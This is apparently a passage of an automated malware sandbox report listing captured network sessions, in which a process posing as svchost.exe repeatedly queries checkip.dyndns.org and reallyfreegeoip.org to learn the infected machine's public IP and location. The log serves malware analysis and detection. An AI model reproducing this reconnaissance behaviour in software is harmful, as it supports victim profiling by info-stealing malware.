                                                                                                                11192.168.2.549759132.226.247.73806572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:33:58.903275013 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:33:59.575700998 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:59 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.549770132.226.247.73806572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:34:00.209162951 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:34:00.880506992 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:00 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                13192.168.2.549780132.226.247.73806572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:34:01.477643013 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:34:02.158644915 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:02 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                14192.168.2.549790132.226.247.73806572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:34:02.790523052 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:34:03.479990959 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:03 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.549801132.226.247.73806572C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 15:34:04.139734030 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 15:34:04.811778069 CET273INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:34:04 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.549705104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:43 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:33:43 UTC855INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:43 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834412
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jF6HiNELroAvLieLYU7XkwuA7xjJnPWm0zUWeixQ0NkCec1fmkwfcNZKQh6%2FJPtVJVYgczoMzTb06%2B%2BpgrLSQR2gzASKL4Y8igZJFRWWwDtP9QFxlsZKhHgY6z81qCeNIIQvZdbi"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd623e8fdd1875-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1679&min_rtt=1617&rtt_var=732&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1377358&cwnd=153&unsent_bytes=0&cid=ec41c50879f003a1&ts=181&x=0"
                                                                                                                2025-01-10 14:33:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.549706104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:44 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 14:33:44 UTC857INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:44 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834413
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QTHRhg1E5gj%2F5g5l2rJXbqTHraqlfACAyoEWQGstVRI7A28zP379jUylc8MvwUzNntsf%2FYv0DQupo%2BYko7Tr5chb6cUDnj45z5whH2uj6%2BnZcs5ZLYsUiEVENnMv8gCMHcmuEC7D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd6244187072b9-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1899&min_rtt=1823&rtt_var=738&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1601755&cwnd=217&unsent_bytes=0&cid=b0158b1a98d7ffb5&ts=166&x=0"
                                                                                                                2025-01-10 14:33:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                2192.168.2.549708104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:45 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:33:45 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:45 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834414
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhtlda51eggYTtKeNWFoFQQ8lMycjGt4sKTJj%2BDsLrvrpSlMC10UDZMaPxC9IrHY5Z0Db0FHH2lgEAlEZVpGQKWLMZzlMn2E6wCBAOBHQbxwvMhO4Zi6AFces8Ux78isNoCJnsgC"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd624c7e3ec327-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1621&rtt_var=639&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1671436&cwnd=189&unsent_bytes=0&cid=4ec609c8e013e7e5&ts=173&x=0"
                                                                                                                2025-01-10 14:33:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.549710104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:46 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 14:33:47 UTC851INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:47 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834416
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWMQwIO9L3OMk2VRvNe4cARMyO7gQogIzaFlC2FnU8u4BKc%2FtsOAywASx6fuU9qOjxXz9f5J6f1CSUvMKoy3AqWSpzF861vtMn0A4imUE84keZ9A6Ea5mePL4ncl8fQqsuUNhehj"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd6254faa01875-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1578&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1801357&cwnd=153&unsent_bytes=0&cid=ec2d9e1e45f87a2b&ts=164&x=0"
                                                                                                                2025-01-10 14:33:47 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.549712104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:48 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 14:33:48 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:48 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834417
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2c6e5OE5fLuHl6DIkraOL%2FsgeZ85hbtgw2JTGzN6mAur329uSjjB4NJl34WdHk06TqOyn2yxFtL5X%2FfJho6bdbpioOW7SbGqw%2B7YmEq%2FXjgmFUfRGvRT%2Fw5tHycpSUIDMtsz1a4z"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd625d0b411875-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1638&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1736028&cwnd=153&unsent_bytes=0&cid=a34af9678bc51130&ts=143&x=0"
                                                                                                                2025-01-10 14:33:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.549714104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 14:33:49 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:49 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834418
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eXGkVCk1qhm001J5Nz%2BH99mdzKkBqjArBIuJ4JNi%2B5wLSc0cii7zYBcRmHWt8H8HZR6IunjCbedMQWtsNUP0vsW3WdBvfnxQsRGz73p%2FG9KUmkZgi84chn%2B0Rrh6WZDCBVA9%2BLQv"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd62656c62c327-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1665&rtt_var=660&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1753753&cwnd=189&unsent_bytes=0&cid=7070277220c85d7c&ts=154&x=0"
                                                                                                                2025-01-10 14:33:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.549716104.21.32.14432684C:\Windows\SysWOW64\svchost.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 14:33:50 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                Host: reallyfreegeoip.org
                                                                                                                2025-01-10 14:33:51 UTC859INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 14:33:50 GMT
                                                                                                                Content-Type: text/xml
                                                                                                                Content-Length: 362
                                                                                                                Connection: close
                                                                                                                Age: 1834420
                                                                                                                Cache-Control: max-age=31536000
                                                                                                                cf-cache-status: HIT
                                                                                                                last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKak%2BDXJ4LdKZ8ctKObMhJQA%2Bz48I%2BfV647oT8P3oudC%2Bb62GrUHgvK0FePLKdwkZvt%2BlBUFepbaAvwRTeP3AfZhegSkFaqZYlxOqVBWSL0kZGMusu8if6PNsYrQXaC6h4EKqpk6"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8ffd626d8cc472b9-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1743&rtt_var=689&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1547429&cwnd=217&unsent_bytes=0&cid=c9ba003d52955a9b&ts=153&x=0"
                                                                                                                2025-01-10 14:33:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
